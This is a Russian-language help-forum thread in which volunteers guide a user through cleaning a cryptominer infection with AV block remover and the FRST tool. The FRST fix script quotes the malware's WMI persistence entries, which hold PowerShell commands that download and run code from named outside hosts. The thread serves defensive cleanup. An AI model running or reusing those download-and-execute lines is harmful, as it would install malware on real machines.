Решена Необходима помощь с анализом логов

[Wu-Tang]

Посмотрите логи пожалуйста:

 

[akok]

Скачайте, распакуйте и запустите (от имени администратора) AV block remover.
По окончании всех процедур произойдет перезагрузка системы. Прикрепите созданный утилитой лог AV_block_remove.log к следующему сообщению.

Если не запускается, то переименуйте ее (например в AV_br.exe)


Повторно запустите Autologger и прикрепите новый CollectionLog.

 

[Wu-Tang]

вот:
майнер был )))

 

[Wu-Tang]

сам посмотрел, ничего такого не увидел, может пропустил?

 

[Sandor]

Да, тут порядок. Кое-что ещё нужно дочистить.

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[Wu-Tang]

вот:

 

[Wu-Tang]

кстати, оперы и хрома по факту нет, смотрю в логах профили остались от них.

на всякий:
хотя тут ничего такого...

 

[Sandor]

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  SystemRestore: On
  CreateRestorePoint:
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
  IFEO\osppsvc.exe: [VerifierDlls] SppExtComObjHook.dll
  IFEO\SppExtComObj.Exe: [VerifierDlls] SppExtComObjHook.dll
  GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
  GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
  Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Task: {48B78AE2-606B-4944-B112-187583C3F818} - System32\Tasks\Opera scheduled Autoupdate 1631609114 => C:\Users\Alexey\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Нет файла)
  Task: {BEBF7873-3453-4121-9550-677D29E97E94} - System32\Tasks\Opera scheduled assistant Autoupdate 1631609118 => C:\Users\Alexey\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Alexey\AppData\Local\Programs\Opera\assistant" $(Arg0)
  CHR HKU\S-1-5-21-2174452874-2025428050-3515732823-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ibknafobnmndicojahlppolcaaibngjf]
  CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
  S3 eapihdrv; C:\Users\Alexey\AppData\Local\Temp\ehdrv.sys [135760 2022-03-17] (ESET, spol. s r.o. -> ESET) <==== ВНИМАНИЕ
  bl (HKLM-x32\...\{2A075BB4-E976-4278-BF3F-E5C6945D84C0}) (Version: 1.0.0 - Your Company Name) Hidden
  ph (HKLM-x32\...\{185F9795-9663-4F13-9EF9-307A282ADB5A}) (Version: 1.0.0 - Your Company Name) Hidden
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"bacru4\"",Filter="__EventFilter.Name=\"bacru3\"::
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"tosa4\"",Filter="__EventFilter.Name=\"tosa3\"::
  WMI:subscription\__EventFilter->bacru3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
  WMI:subscription\__EventFilter->tosa3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10500 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
  WMI:subscription\CommandLineEventConsumer->bacru4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.oopmus.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://bec.rocop.ru:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oo (запись имеет ещё 358 символов).]
  WMI:subscription\CommandLineEventConsumer->tosa4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.webpublicservices.org:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadStri (запись имеет ещё 410 символов).]
  AlternateDataStreams: C:\Users\Alexey\Cookies:S4TkbahIeHWiFsMD75xjefRLlM5cK [2208]
  AlternateDataStreams: C:\Users\Alexey\Local Settings:YdiwbpVIjdBrC4lA [2014]
  AlternateDataStreams: C:\Users\Alexey\AppData\Local:YdiwbpVIjdBrC4lA [2014]
  AlternateDataStreams: C:\Users\Alexey\AppData\Local\Application Data:YdiwbpVIjdBrC4lA [2014]
  FirewallRules: [{38AF68D1-6B12-43EC-A63A-A25279950944}] => (Allow) LPort=1688
  FirewallRules: [{636417D4-51AC-478D-A077-E7E8D863ECB7}] => (Allow) LPort=5357
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  StartBatch:
    del /s /q C:\Windows\SoftwareDistribution\download\*.*
    del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*"
    del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Cache\*.*"
    del /s /q "%userprofile%\AppData\Local\Opera Software\Opera Stable\Cache\Cache_Data\*.*"
  EndBatch:
  C:\Windows\Temp\*.*
  C:\WINDOWS\system32\*.tmp
  C:\WINDOWS\syswow64\*.tmp
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.


Скрытые ранее хвосты от Adobe

bl
ph

станут видны в перечне установленных. Удалите.

 

[Wu-Tang]

готово:

 

[Wu-Tang]

хвосты появились bl и ph, удалил через установку и удаление программ.

 

[akok]

Что с проблемой?

 

[Wu-Tang]

Не наблюдается, изначально вентиль молотил постоянно, после прохода avbr перестал, те нормализовалось.
А по логам, я смотрю, чисто уже, верно?

 

[akok]

Да, плохого не видно. Тогда завершаем.

Подготовьте лог лог SecurityCheck by glax24

Чтобы автоматически удалить все файлы и папки, созданные FRST, в том числе сам инструмент, переименуйте FRST/FRST64.exe в uninstall.exe и запустите его. Процедура требует перезагрузки

 

[Wu-Tang]

Думаю да, по симптомам нормально, хотелось хвосты еще подчистить просто все.
вот:

 

[akok]

Уже подчистили через FRST, стоит исправить

--------------------------- [ OtherUtilities ] ----------------------------
NVIDIA GeForce Experience 3.20.5.70 v.3.20.5.70 Внимание! Скачать обновления
Microsoft Office - стандартный выпуск версии 2003 v.11.0.5614.0 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 6.00 (64-bit) v.6.00.0 Внимание! Скачать обновления

 

[Wu-Tang]

Хорошо, принято!

 

[Wu-Tang]

@akok, @Sandor,
Благодарю за помощь!

 

[akok]

Удачи!